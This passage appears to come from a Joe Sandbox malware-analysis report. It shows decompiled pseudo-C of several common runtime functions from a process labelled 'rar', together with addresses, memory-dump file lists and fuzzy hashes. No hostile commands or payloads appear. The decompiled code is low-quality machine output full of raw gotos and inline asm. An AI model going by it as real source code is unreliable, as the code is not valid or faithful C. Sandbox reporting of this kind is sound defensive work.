                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastPrivilegeRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 1334314998-0
                                                                                                            • Opcode ID: 510a2ecf8a1d781115ad1546572a1c8c65a9c11016c840d7bdb1c1475d8664b9
                                                                                                            • Instruction ID: 47436ccccc28bf9138c135eeab6085b8ef1196e80308840a58b99c73b34d23e2
                                                                                                            • Opcode Fuzzy Hash: 510a2ecf8a1d781115ad1546572a1c8c65a9c11016c840d7bdb1c1475d8664b9
                                                                                                            • Instruction Fuzzy Hash: 5EE08650F6920367FF549BF294C417922905F9AF42F0C0034CD4FE6361DF2DD4814201
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6E21C Relevance: 1.7, APIs: 1, Instructions: 174COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 45%
                                                                                                            			E00007FF67FF650B6E21C(void* __ebp, void* __eflags, long long __rcx, void* __rdx, void* __rbp, void* __r8) {
				signed int _v88;
				long long _v112;
				signed int _v120;
				char _v136;
				long long _v152;
				long long _v160;
				signed int _v164;
				long long _v184;
				long long _v192;
				long long _v200;
				signed long long _v208;
				void* _v216;
				long long _v224;
				char _v232;
				signed int _v240;
				intOrPtr _v244;
				signed int _v248;
				long long _v256;
				char _v264;
				long long _v280;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				intOrPtr _t88;
				void* _t96;
				void* _t97;
				signed char _t100;
				signed int _t106;
				signed long long _t124;
				signed long long _t125;
				long long _t131;
				intOrPtr* _t133;
				void* _t134;
				void* _t137;
				char* _t141;
				long long _t153;
				long long _t154;
				void* _t159;
				intOrPtr* _t161;
				void* _t164;
				long long _t173;
				intOrPtr* _t175;
				long long _t177;

				_t165 = _t164 - 0x100;
				asm("movaps [eax-0x48], xmm6");
				_t124 =  *0x50b978f0; // 0x27db226282f1
				_t125 = _t124 ^ _t164 - 0x00000100;
				_v88 = _t125;
				r13d = r9d;
				_t134 = __r8;
				_t173 = __rcx;
				_v200 = __rcx;
				_v216 = __rcx;
				_v240 = r9d;
				E00007FF67FF650B6B8C0(_t125);
				_v208 = _t125;
				_t137 = __r8;
				E00007FF67FF650B6CA38(__ebp, __r8, __r8, __rdx, _t159, __rdx, __rbp);
				_t175 = __rdx + 0x48;
				_v192 = _t175;
				if ( *_t175 == 0) goto 0x50b6e29f;
				E00007FF67FF650B6C8F0(_t125);
				if ( *(_t125 + 0x78) != 0xfffffffe) goto 0x50b6e50f;
				goto 0x50b6e2be;
				E00007FF67FF650B6C8F0(_t125);
				if ( *(_t125 + 0x78) == 0xfffffffe) goto 0x50b6e2be;
				E00007FF67FF650B6C8F0(_t125);
				_t106 =  *(_t125 + 0x78);
				E00007FF67FF650B6C8F0(_t125);
				 *(_t125 + 0x78) = 0xfffffffe;
				E00007FF67FF650B6C8F0(_t125);
				 *((intOrPtr*)(_t125 + 0x30)) =  *((intOrPtr*)(_t125 + 0x30)) + 1;
				_t161 = __rdx + 8;
				_v184 = _t161;
				if ( *((intOrPtr*)(_t134 + 8)) == 0) goto 0x50b6e317;
				_t100 =  *(_t137 + 0x7ff650b85e30) & 0x000000ff;
				_t153 =  *((intOrPtr*)(_t134 + 8)) +  *_t161 -  *((char*)(_t137 + 0x7ff650b85e20));
				_v120 =  *(_t153 - 4) >> _t100;
				_v112 = _t153;
				goto 0x50b6e327;
				_v120 = _v120 & 0x00000000;
				_t154 = _v112;
				_v264 =  &_v120;
				_v256 = _t154;
				_v232 =  &_v120;
				_v224 = _t154;
				_v280 =  &_v232;
				r8d = r13d;
				E00007FF67FF650B6E748(_t106, _t134,  &_v120,  &_v264);
				_v160 =  &_v120;
				_t131 = _v112;
				_v152 = _t131;
				_t177 = _v256;
				if (_t177 - _t131 < 0) goto 0x50b6e4d1;
				if (_t177 - _v224 <= 0) goto 0x50b6e4d1;
				E00007FF67FF650B6E690(_v264,  &_v256);
				_v256 = _t177;
				asm("movups xmm6, [ebx+0x10]");
				asm("movups [esp+0x88], xmm6");
				asm("movaps xmm0, [esp+0x30]");
				asm("movdqa [esp+0xb0], xmm0");
				E00007FF67FF650B6E690(_v264,  &_v256);
				_v256 = _t177 - _t131;
				_v280 =  &_v264;
				r9d = _t106;
				_t141 =  &_v232;
				_t88 = E00007FF67FF650B6E818(r13d, _v264, _t141, _t161,  &_v136);
				_v244 = _t88;
				_v248 = _v248 & 0x00000000;
				r9d = 0;
				asm("movdqa xmm0, xmm6");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				asm("psrldq xmm6, 0x4");
				asm("movd ecx, xmm6");
				r9d =  !=  ? _t88 : r9d;
				_v248 = r9d;
				if (r9d == 0) goto 0x50b6e4cc;
				_t59 = _t159 + 2; // 0x2
				 *_t175 = _t59;
				if (_t141 - 1 - 1 <= 0) goto 0x50b6e46f;
				r8d = 0x103;
				E00007FF67FF650B6ECE0(r9d +  *_t161, _t173,  &_v264);
				goto 0x50b6e4a5;
				_t133 = _v216;
				if (_t100 != 2) goto 0x50b6e489;
				goto 0x50b6e494;
				r8d = _v164;
				r9d = 0x103; // executed
				E00007FF67FF650B6ED90(r9d +  *_t161,  *_t133,  *((intOrPtr*)(_t133 +  *_t133)) +  *_t133,  &_v264); // executed
				E00007FF67FF650B6B8E8(_t133, _v208);
				r13d = _v240;
				goto 0x50b6e36d;
				E00007FF67FF650B6C8F0(_t133);
				if ( *((intOrPtr*)(_t133 + 0x30)) <= 0) goto 0x50b6e4e4;
				_t96 = E00007FF67FF650B6C8F0(_t133);
				 *((intOrPtr*)(_t133 + 0x30)) =  *((intOrPtr*)(_t133 + 0x30)) - 1;
				_t97 = E00007FF67FF650B69D10(_t96, _t100, _v88 ^ _t165);
				asm("movaps xmm6, [esp+0xf0]");
				return _t97;
			}














































                                                                                                            0x7ff650b6e22a
                                                                                                            0x7ff650b6e231
                                                                                                            0x7ff650b6e235
                                                                                                            0x7ff650b6e23c
                                                                                                            0x7ff650b6e23f
                                                                                                            0x7ff650b6e247
                                                                                                            0x7ff650b6e24a
                                                                                                            0x7ff650b6e250
                                                                                                            0x7ff650b6e253
                                                                                                            0x7ff650b6e258
                                                                                                            0x7ff650b6e25d
                                                                                                            0x7ff650b6e262
                                                                                                            0x7ff650b6e267
                                                                                                            0x7ff650b6e26f
                                                                                                            0x7ff650b6e272
                                                                                                            0x7ff650b6e279
                                                                                                            0x7ff650b6e27d
                                                                                                            0x7ff650b6e286
                                                                                                            0x7ff650b6e288
                                                                                                            0x7ff650b6e291
                                                                                                            0x7ff650b6e29d
                                                                                                            0x7ff650b6e29f
                                                                                                            0x7ff650b6e2a8
                                                                                                            0x7ff650b6e2aa
                                                                                                            0x7ff650b6e2af
                                                                                                            0x7ff650b6e2b2
                                                                                                            0x7ff650b6e2b7
                                                                                                            0x7ff650b6e2be
                                                                                                            0x7ff650b6e2c3
                                                                                                            0x7ff650b6e2c6
                                                                                                            0x7ff650b6e2ca
                                                                                                            0x7ff650b6e2d6
                                                                                                            0x7ff650b6e2f5
                                                                                                            0x7ff650b6e2fe
                                                                                                            0x7ff650b6e306
                                                                                                            0x7ff650b6e30d
                                                                                                            0x7ff650b6e315
                                                                                                            0x7ff650b6e317
                                                                                                            0x7ff650b6e31f
                                                                                                            0x7ff650b6e32f
                                                                                                            0x7ff650b6e334
                                                                                                            0x7ff650b6e341
                                                                                                            0x7ff650b6e346
                                                                                                            0x7ff650b6e350
                                                                                                            0x7ff650b6e35a
                                                                                                            0x7ff650b6e367
                                                                                                            0x7ff650b6e375
                                                                                                            0x7ff650b6e37d
                                                                                                            0x7ff650b6e385
                                                                                                            0x7ff650b6e38d
                                                                                                            0x7ff650b6e395
                                                                                                            0x7ff650b6e3a0
                                                                                                            0x7ff650b6e3b0
                                                                                                            0x7ff650b6e3b5
                                                                                                            0x7ff650b6e3bf
                                                                                                            0x7ff650b6e3c3
                                                                                                            0x7ff650b6e3cb
                                                                                                            0x7ff650b6e3d0
                                                                                                            0x7ff650b6e3e1
                                                                                                            0x7ff650b6e3ec
                                                                                                            0x7ff650b6e3f6
                                                                                                            0x7ff650b6e3fb
                                                                                                            0x7ff650b6e409
                                                                                                            0x7ff650b6e40e
                                                                                                            0x7ff650b6e415
                                                                                                            0x7ff650b6e419
                                                                                                            0x7ff650b6e41e
                                                                                                            0x7ff650b6e421
                                                                                                            0x7ff650b6e425
                                                                                                            0x7ff650b6e42a
                                                                                                            0x7ff650b6e42e
                                                                                                            0x7ff650b6e433
                                                                                                            0x7ff650b6e439
                                                                                                            0x7ff650b6e43d
                                                                                                            0x7ff650b6e445
                                                                                                            0x7ff650b6e44b
                                                                                                            0x7ff650b6e44e
                                                                                                            0x7ff650b6e457
                                                                                                            0x7ff650b6e45f
                                                                                                            0x7ff650b6e468
                                                                                                            0x7ff650b6e46d
                                                                                                            0x7ff650b6e46f
                                                                                                            0x7ff650b6e47a
                                                                                                            0x7ff650b6e487
                                                                                                            0x7ff650b6e489
                                                                                                            0x7ff650b6e49a
                                                                                                            0x7ff650b6e4a0
                                                                                                            0x7ff650b6e4aa
                                                                                                            0x7ff650b6e4c7
                                                                                                            0x7ff650b6e4cc
                                                                                                            0x7ff650b6e4d1
                                                                                                            0x7ff650b6e4da
                                                                                                            0x7ff650b6e4dc
                                                                                                            0x7ff650b6e4e1
                                                                                                            0x7ff650b6e4ef
                                                                                                            0x7ff650b6e4f4
                                                                                                            0x7ff650b6e50e

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 4206212132-0
                                                                                                            • Opcode ID: 9e49b41860bef197261bd3c3cda5a4f20df838603c72913dd09047f4c617f570
                                                                                                            • Instruction ID: 8de03b4201a17b7c8858a57516208a79692e40797694e281a861d06ae06533bf
                                                                                                            • Opcode Fuzzy Hash: 9e49b41860bef197261bd3c3cda5a4f20df838603c72913dd09047f4c617f570
                                                                                                            • Instruction Fuzzy Hash: 2871A132A18B8296E660DF64E4817BEB7A0FB86784F144135EB9E93B55DF3ED441CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B7256C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E00007FF67FF650B7256C(void* __ecx, void* __edx, void* __edi, long long __rbx, long long __rdi, long long __rsi, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t28;
				void* _t46;
				signed long long _t61;
				long long _t63;
				intOrPtr* _t66;
				signed long long _t67;
				signed long long _t76;
				void* _t81;
				signed long long _t82;
				void* _t85;
				WCHAR* _t88;

				_t79 = __rsi;
				_t63 = __rbx;
				_t61 = _t82;
				 *((long long*)(_t61 + 8)) = __rbx;
				 *((long long*)(_t61 + 0x10)) = __rsi;
				 *((long long*)(_t61 + 0x18)) = __rdi;
				 *((long long*)(_t61 + 0x20)) = __r14;
				_t46 = r8d;
				r14d = __ecx;
				if (r8d != 0) goto 0x50b725dc;
				GetModuleHandleW(_t88);
				if (_t61 == 0) goto 0x50b725dc;
				if ( *_t61 != 0x5a4d) goto 0x50b725dc;
				_t66 =  *((intOrPtr*)(_t61 + 0x3c)) + _t61;
				if ( *_t66 != 0x4550) goto 0x50b725dc;
				if ( *((intOrPtr*)(_t66 + 0x18)) != 0x20b) goto 0x50b725dc;
				if ( *((intOrPtr*)(_t66 + 0x84)) - 0xe <= 0) goto 0x50b725dc;
				if ( *((intOrPtr*)(_t66 + 0xf8)) == _t46) goto 0x50b725dc;
				E00007FF67FF650B72724(0x20b, r14d, _t61, __rbx);
				E00007FF67FF650B76968();
				if ( *0x50bb3a30 != 0) goto 0x50b726a6;
				r15d = 1;
				 *0x50bb3a20 = r15d;
				if (__edx != 0) goto 0x50b7264f;
				_t76 =  *0x50b978f0; // 0x27db226282f1
				asm("dec eax");
				_t62 = _t61 ^ _t76;
				_t67 =  *0x50bb3a28; // 0x27db226282f1
				if (_t67 == (_t61 ^ _t76)) goto 0x50b72646;
				asm("dec eax");
				 *0x50b80540();
				r8d = 0;
				 *(_t76 ^ _t67)();
				goto 0x50b7265b;
				if (__edx != r15d) goto 0x50b72661;
				E00007FF67FF650B74290(0x50bb3bb0); // executed
				if (__edx != 0) goto 0x50b72678;
				E00007FF67FF650B74590(_t63, 0x50b80628, 0x50b80648, _t76 ^ _t67, __rsi);
				E00007FF67FF650B74590(_t63, 0x50b80650, 0x50b80658, _t76 ^ _t67, _t79);
				_t27 =  ==  ? r15d :  *0x50bb3a30 & 0x000000ff;
				 *0x50bb3a30 =  ==  ? r15d :  *0x50bb3a30 & 0x000000ff;
				_t28 = E00007FF67FF650B7360C(0, _t62, _t63, 0x50b80658, _t79, _t81, _t85);
				E00007FF67FF650B769C8();
				if (_t46 != 0) goto 0x50b726bd;
				E00007FF67FF650B726D8(); // executed
				asm("int3");
				return _t28;
			}














                                                                                                            0x7ff650b7256c
                                                                                                            0x7ff650b7256c
                                                                                                            0x7ff650b7256c
                                                                                                            0x7ff650b7256f
                                                                                                            0x7ff650b72573
                                                                                                            0x7ff650b72577
                                                                                                            0x7ff650b7257b
                                                                                                            0x7ff650b72585
                                                                                                            0x7ff650b7258a
                                                                                                            0x7ff650b72590
                                                                                                            0x7ff650b72594
                                                                                                            0x7ff650b7259d
                                                                                                            0x7ff650b725a7
                                                                                                            0x7ff650b725ad
                                                                                                            0x7ff650b725b6
                                                                                                            0x7ff650b725c1
                                                                                                            0x7ff650b725ca
                                                                                                            0x7ff650b725d2
                                                                                                            0x7ff650b725d7
                                                                                                            0x7ff650b725e1
                                                                                                            0x7ff650b725ee
                                                                                                            0x7ff650b725f4
                                                                                                            0x7ff650b725fd
                                                                                                            0x7ff650b72605
                                                                                                            0x7ff650b72607
                                                                                                            0x7ff650b7261a
                                                                                                            0x7ff650b7261d
                                                                                                            0x7ff650b72620
                                                                                                            0x7ff650b7262a
                                                                                                            0x7ff650b72631
                                                                                                            0x7ff650b72637
                                                                                                            0x7ff650b7263d
                                                                                                            0x7ff650b72644
                                                                                                            0x7ff650b7264d
                                                                                                            0x7ff650b72652
                                                                                                            0x7ff650b7265b
                                                                                                            0x7ff650b72663
                                                                                                            0x7ff650b72673
                                                                                                            0x7ff650b72686
                                                                                                            0x7ff650b72694
                                                                                                            0x7ff650b72698
                                                                                                            0x7ff650b726a0
                                                                                                            0x7ff650b726ab
                                                                                                            0x7ff650b726b2
                                                                                                            0x7ff650b726b7
                                                                                                            0x7ff650b726bc
                                                                                                            0x7ff650b726d7

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3947729631-0
                                                                                                            • Opcode ID: f8191b40d07037edacaaa93a1083ca2c1f689fc23c93595888f8f8a68027e740
                                                                                                            • Instruction ID: 1e4234947262b8d4e783acff9d85ab9d59b3f63a562d86c6dad2b58a4bfffb86
                                                                                                            • Opcode Fuzzy Hash: f8191b40d07037edacaaa93a1083ca2c1f689fc23c93595888f8f8a68027e740
                                                                                                            • Instruction Fuzzy Hash: DC419D21A19643A7FF649B10D8E017823A1AF96B41F18403AD90FE77A1EF3FE8818740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6B54C Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unwind
                                                                                                            • String ID:
                                                                                                            • API String ID: 3419175465-0
                                                                                                            • Opcode ID: 83316d55b1f4d949b4c824a4c6c3a89685be1e0630d27286355fbe31cb207814
                                                                                                            • Instruction ID: 9d38b64ee6774684875be8bf1498a5c760cb9112f4c1b66d86f8ae566eea08e1
                                                                                                            • Opcode Fuzzy Hash: 83316d55b1f4d949b4c824a4c6c3a89685be1e0630d27286355fbe31cb207814
                                                                                                            • Instruction Fuzzy Hash: A2310737A05F848AE340CF68D5412AC33B4F799B88F15A225DF8C66726EF35E1A5C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6A600 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E00007FF67FF650B6A600(void* __eflags, intOrPtr* __rax, void* __rcx) {
				void* __rbx;
				void* _t1;
				intOrPtr _t5;
				void* _t19;
				intOrPtr* _t32;
				void* _t33;
				void* _t37;

				_t32 = __rax;
				E00007FF67FF650B744F0(_t1, 1);
				E00007FF67FF650B72D50(E00007FF67FF650B6ADC8(), __rax, __rcx);
				_t5 = E00007FF67FF650B6AC50();
				E00007FF67FF650B74798(_t5);
				 *_t32 = _t5;
				if (E00007FF67FF650B6A1C8(1, _t32) == 0) goto 0x50b6a6ab;
				E00007FF67FF650B6AE20(_t33);
				E00007FF67FF650B6A378(E00007FF67FF650B6A1C8(1, _t32), _t32);
				if (E00007FF67FF650B739E4(E00007FF67FF650B6AAD4(), _t32, _t33, E00007FF67FF650B6AE60, _t37) != 0) goto 0x50b6a6ab;
				E00007FF67FF650B6ADD0();
				if (E00007FF67FF650B6AE04() == 0) goto 0x50b6a673;
				E00007FF67FF650B2EE10(E00007FF67FF650B2EE10(E00007FF67FF650B74568(_t12, E00007FF67FF650B6AC50)));
				E00007FF67FF650B746F8(E00007FF67FF650B6AC50(), _t32, E00007FF67FF650B6AC50);
				if (E00007FF67FF650B5D040() == 0) goto 0x50b6a697; // executed
				0x50b73ec0(); // executed
				_t19 = E00007FF67FF650B6AC50();
				0x50b6ac3c();
				if (_t19 != 0) goto 0x50b6a6ab;
				return _t19;
			}










                                                                                                            0x7ff650b6a600
                                                                                                            0x7ff650b6a60b
                                                                                                            0x7ff650b6a617
                                                                                                            0x7ff650b6a61c
                                                                                                            0x7ff650b6a623
                                                                                                            0x7ff650b6a62d
                                                                                                            0x7ff650b6a636
                                                                                                            0x7ff650b6a638
                                                                                                            0x7ff650b6a644
                                                                                                            0x7ff650b6a657
                                                                                                            0x7ff650b6a659
                                                                                                            0x7ff650b6a665
                                                                                                            0x7ff650b6a678
                                                                                                            0x7ff650b6a684
                                                                                                            0x7ff650b6a690
                                                                                                            0x7ff650b6a692
                                                                                                            0x7ff650b6a697
                                                                                                            0x7ff650b6a69c
                                                                                                            0x7ff650b6a6a3
                                                                                                            0x7ff650b6a6aa

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Initialize_invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 3826479659-0
                                                                                                            • Opcode ID: 9b08fef2f1c6b020a101e195eabeefc03c97f8d8a7897647bf3abc73011ac514
                                                                                                            • Instruction ID: b63f0d1cabbd02a8efc47bd47c4b79c3afddfc350b6a9c30cc0519bbcead893f
                                                                                                            • Opcode Fuzzy Hash: 9b08fef2f1c6b020a101e195eabeefc03c97f8d8a7897647bf3abc73011ac514
                                                                                                            • Instruction Fuzzy Hash: AF116890E1810762FE5477B189D62B911819F93305F6D0434EA1FFA3C3EE1FF8918A62
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B24B2C Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 27%
                                                                                                            			E00007FF67FF650B24B2C(void* __ecx, void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rbp, void* __r8, void* _a8, long long _a16, long long _a24) {
				void* __rsi;
				void* _t40;

				_t41 = __rbp;
				_a16 = __rbx;
				_a24 = __rbp;
				r14d = 0;
				bpl = __edx;
				 *((intOrPtr*)(__rcx + 0x952a)) = r14w;
				_t40 = __rcx;
				 *((intOrPtr*)(__rcx + 0x9521)) = r14b;
				GetCommandLineW();
				E00007FF67FF650B23E80(__rax, __rbx, __rax,  &_a8, __rcx);
				if (__rax == 0) goto 0x50b24bb1;
				0x50b6edd8();
				E00007FF67FF650B23E80(__rax, _a8, __rax,  &_a8, _t40);
				if (__rax == 0) goto 0x50b24bb1;
				if (bpl == 0) goto 0x50b24baa;
				E00007FF67FF650B24CD8(_a8, _t40, _a8, _t40, __rbp);
				goto 0x50b24b76; // executed
				E00007FF67FF650B247F0(__rax, _a8, _t40, _a8, _t41); // executed
				goto 0x50b24b76;
				if (bpl != 0) goto 0x50b24bbe;
				return E00007FF67FF650B24BD4(__rax, _t40);
			}





                                                                                                            0x7ff650b24b2c
                                                                                                            0x7ff650b24b2c
                                                                                                            0x7ff650b24b31
                                                                                                            0x7ff650b24b3e
                                                                                                            0x7ff650b24b41
                                                                                                            0x7ff650b24b44
                                                                                                            0x7ff650b24b4c
                                                                                                            0x7ff650b24b4f
                                                                                                            0x7ff650b24b56
                                                                                                            0x7ff650b24b64
                                                                                                            0x7ff650b24b6f
                                                                                                            0x7ff650b24b79
                                                                                                            0x7ff650b24b86
                                                                                                            0x7ff650b24b91
                                                                                                            0x7ff650b24ba1
                                                                                                            0x7ff650b24ba3
                                                                                                            0x7ff650b24ba8
                                                                                                            0x7ff650b24baa
                                                                                                            0x7ff650b24baf
                                                                                                            0x7ff650b24bb4
                                                                                                            0x7ff650b24bd0

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CommandLine
                                                                                                            • String ID:
                                                                                                            • API String ID: 3253501508-0
                                                                                                            • Opcode ID: 9615e59096b1f0e0dd677d919d50388a0b7a315dbaf6bac81231335495cbf0f8
                                                                                                            • Instruction ID: 54668c6a220ccca913c2c37ae4aabbdb507e1510f3036e62da55fcf00925859c
                                                                                                            • Opcode Fuzzy Hash: 9615e59096b1f0e0dd677d919d50388a0b7a315dbaf6bac81231335495cbf0f8
                                                                                                            • Instruction Fuzzy Hash: F501CC01A0DB8361F911EB16A9851BE6250AF4BBD0F1C0031DF4E67F9AEF3ED4028351
